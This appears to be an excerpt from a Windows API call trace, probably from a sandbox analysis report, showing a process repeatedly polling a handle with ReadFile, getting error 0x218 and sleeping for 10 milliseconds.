	[0200.929] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0200.929] GetLastError () returned 0x218
	[0200.929] Sleep (dwMilliseconds=0xa) 
	[0200.945] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0200.945] GetLastError () returned 0x218
	[0200.945] Sleep (dwMilliseconds=0xa) 
	[0200.961] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0200.961] GetLastError () returned 0x218
	[0200.961] Sleep (dwMilliseconds=0xa) 
	[0201.007] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.007] GetLastError () returned 0x218
	[0201.007] Sleep (dwMilliseconds=0xa) 
	[0201.053] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.053] GetLastError () returned 0x218
	[0201.053] Sleep (dwMilliseconds=0xa) 
	[0201.111] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.111] GetLastError () returned 0x218
	[0201.111] Sleep (dwMilliseconds=0xa) 
	[0201.116] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.116] GetLastError () returned 0x218
	[0201.116] Sleep (dwMilliseconds=0xa) 
	[0201.131] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.131] GetLastError () returned 0x218
	[0201.131] Sleep (dwMilliseconds=0xa) 
	[0201.147] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.147] GetLastError () returned 0x218
	[0201.147] Sleep (dwMilliseconds=0xa) 
	[0201.163] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.163] GetLastError () returned 0x218
	[0201.163] Sleep (dwMilliseconds=0xa) 
	[0201.179] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.179] GetLastError () returned 0x218
	[0201.179] Sleep (dwMilliseconds=0xa) 
	[0201.225] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.225] GetLastError () returned 0x218
	[0201.225] Sleep (dwMilliseconds=0xa) 
	[0201.274] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.274] GetLastError () returned 0x218
	[0201.274] Sleep (dwMilliseconds=0xa) 
	[0201.288] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.288] GetLastError () returned 0x218
	[0201.288] Sleep (dwMilliseconds=0xa) 
	[0201.303] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.303] GetLastError () returned 0x218
	[0201.303] Sleep (dwMilliseconds=0xa) 
	[0201.319] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.319] GetLastError () returned 0x218
	[0201.319] Sleep (dwMilliseconds=0xa) 
	[0201.334] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.334] GetLastError () returned 0x218
	[0201.335] Sleep (dwMilliseconds=0xa) 
	[0201.350] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.350] GetLastError () returned 0x218
	[0201.350] Sleep (dwMilliseconds=0xa) 
	[0201.367] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.367] GetLastError () returned 0x218
	[0201.367] Sleep (dwMilliseconds=0xa) 
	[0201.381] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.381] GetLastError () returned 0x218
	[0201.381] Sleep (dwMilliseconds=0xa) 
	[0201.428] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.428] GetLastError () returned 0x218
	[0201.428] Sleep (dwMilliseconds=0xa) 
	[0201.461] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.461] GetLastError () returned 0x218
	[0201.461] Sleep (dwMilliseconds=0xa) 
	[0201.492] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.492] GetLastError () returned 0x218
	[0201.492] Sleep (dwMilliseconds=0xa) 
	[0201.506] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.506] GetLastError () returned 0x218
	[0201.506] Sleep (dwMilliseconds=0xa) 
	[0201.524] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.524] GetLastError () returned 0x218
	[0201.524] Sleep (dwMilliseconds=0xa) 
	[0201.538] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.538] GetLastError () returned 0x218
	[0201.538] Sleep (dwMilliseconds=0xa) 
	[0201.553] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.553] GetLastError () returned 0x218
	[0201.553] Sleep (dwMilliseconds=0xa) 
	[0201.569] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.569] GetLastError () returned 0x218
	[0201.569] Sleep (dwMilliseconds=0xa) 
	[0201.587] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.587] GetLastError () returned 0x218
	[0201.587] Sleep (dwMilliseconds=0xa) 
	[0201.599] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.600] GetLastError () returned 0x218
	[0201.600] Sleep (dwMilliseconds=0xa) 
	[0201.646] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.646] GetLastError () returned 0x218
	[0201.647] Sleep (dwMilliseconds=0xa) 
	[0201.756] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.756] GetLastError () returned 0x218
	[0201.756] Sleep (dwMilliseconds=0xa) 
	[0201.833] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.833] GetLastError () returned 0x218
	[0201.833] Sleep (dwMilliseconds=0xa) 
	[0201.880] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.880] GetLastError () returned 0x218
	[0201.880] Sleep (dwMilliseconds=0xa) 
	[0201.914] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.914] GetLastError () returned 0x218
	[0201.914] Sleep (dwMilliseconds=0xa) 
	[0201.974] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0201.974] GetLastError () returned 0x218
	[0201.974] Sleep (dwMilliseconds=0xa) 
	[0202.021] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.021] GetLastError () returned 0x218
	[0202.021] Sleep (dwMilliseconds=0xa) 
	[0202.039] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.039] GetLastError () returned 0x218
	[0202.039] Sleep (dwMilliseconds=0xa) 
	[0202.079] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.079] GetLastError () returned 0x218
	[0202.079] Sleep (dwMilliseconds=0xa) 
	[0202.083] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.083] GetLastError () returned 0x218
	[0202.083] Sleep (dwMilliseconds=0xa) 
	[0202.099] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.099] GetLastError () returned 0x218
	[0202.099] Sleep (dwMilliseconds=0xa) 
	[0202.114] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.115] GetLastError () returned 0x218
	[0202.115] Sleep (dwMilliseconds=0xa) 
	[0202.130] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.130] GetLastError () returned 0x218
	[0202.130] Sleep (dwMilliseconds=0xa) 
	[0202.146] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.146] GetLastError () returned 0x218
	[0202.146] Sleep (dwMilliseconds=0xa) 
	[0202.195] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.195] GetLastError () returned 0x218
	[0202.195] Sleep (dwMilliseconds=0xa) 
	[0202.239] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.239] GetLastError () returned 0x218
	[0202.239] Sleep (dwMilliseconds=0xa) 
	[0202.269] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.269] GetLastError () returned 0x218
	[0202.269] Sleep (dwMilliseconds=0xa) 
	[0202.272] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.272] GetLastError () returned 0x218
	[0202.272] Sleep (dwMilliseconds=0xa) 
	[0202.286] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.286] GetLastError () returned 0x218
	[0202.286] Sleep (dwMilliseconds=0xa) 
	[0202.302] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.302] GetLastError () returned 0x218
	[0202.302] Sleep (dwMilliseconds=0xa) 
	[0202.318] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.318] GetLastError () returned 0x218
	[0202.318] Sleep (dwMilliseconds=0xa) 
	[0202.333] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.333] GetLastError () returned 0x218
	[0202.333] Sleep (dwMilliseconds=0xa) 
	[0202.348] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.348] GetLastError () returned 0x218
	[0202.348] Sleep (dwMilliseconds=0xa) 
	[0202.364] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.364] GetLastError () returned 0x218
	[0202.364] Sleep (dwMilliseconds=0xa) 
	[0202.413] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.413] GetLastError () returned 0x218
	[0202.413] Sleep (dwMilliseconds=0xa) 
	[0202.466] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.466] GetLastError () returned 0x218
	[0202.466] Sleep (dwMilliseconds=0xa) 
	[0202.488] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.488] GetLastError () returned 0x218
	[0202.488] Sleep (dwMilliseconds=0xa) 
	[0202.491] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.491] GetLastError () returned 0x218
	[0202.491] Sleep (dwMilliseconds=0xa) 
	[0202.504] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.504] GetLastError () returned 0x218
	[0202.504] Sleep (dwMilliseconds=0xa) 
	[0202.520] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.520] GetLastError () returned 0x218
	[0202.520] Sleep (dwMilliseconds=0xa) 
	[0202.536] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.536] GetLastError () returned 0x218
	[0202.536] Sleep (dwMilliseconds=0xa) 
	[0202.551] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.551] GetLastError () returned 0x218
	[0202.551] Sleep (dwMilliseconds=0xa) 
	[0202.567] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.567] GetLastError () returned 0x218
	[0202.567] Sleep (dwMilliseconds=0xa) 
	[0202.582] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.582] GetLastError () returned 0x218
	[0202.582] Sleep (dwMilliseconds=0xa) 
	[0202.631] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.631] GetLastError () returned 0x218
	[0202.632] Sleep (dwMilliseconds=0xa) 
	[0202.676] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.676] GetLastError () returned 0x218
	[0202.676] Sleep (dwMilliseconds=0xa) 
	[0202.701] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.701] GetLastError () returned 0x218
	[0202.701] Sleep (dwMilliseconds=0xa) 
	[0202.707] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.707] GetLastError () returned 0x218
	[0202.707] Sleep (dwMilliseconds=0xa) 
	[0202.724] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.724] GetLastError () returned 0x218
	[0202.724] Sleep (dwMilliseconds=0xa) 
	[0202.741] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.741] GetLastError () returned 0x218
	[0202.741] Sleep (dwMilliseconds=0xa) 
	[0202.754] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.754] GetLastError () returned 0x218
	[0202.754] Sleep (dwMilliseconds=0xa) 
	[0202.769] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.769] GetLastError () returned 0x218
	[0202.770] Sleep (dwMilliseconds=0xa) 
	[0202.785] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.785] GetLastError () returned 0x218
	[0202.785] Sleep (dwMilliseconds=0xa) 
	[0202.815] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.815] GetLastError () returned 0x218
	[0202.815] Sleep (dwMilliseconds=0xa) 
	[0202.850] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.850] GetLastError () returned 0x218
	[0202.850] Sleep (dwMilliseconds=0xa) 
	[0202.894] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.894] GetLastError () returned 0x218
	[0202.894] Sleep (dwMilliseconds=0xa) 
	[0202.920] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.920] GetLastError () returned 0x218
	[0202.920] Sleep (dwMilliseconds=0xa) 
	[0202.925] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.925] GetLastError () returned 0x218
	[0202.925] Sleep (dwMilliseconds=0xa) 
	[0202.942] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.942] GetLastError () returned 0x218
	[0202.942] Sleep (dwMilliseconds=0xa) 
	[0202.957] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
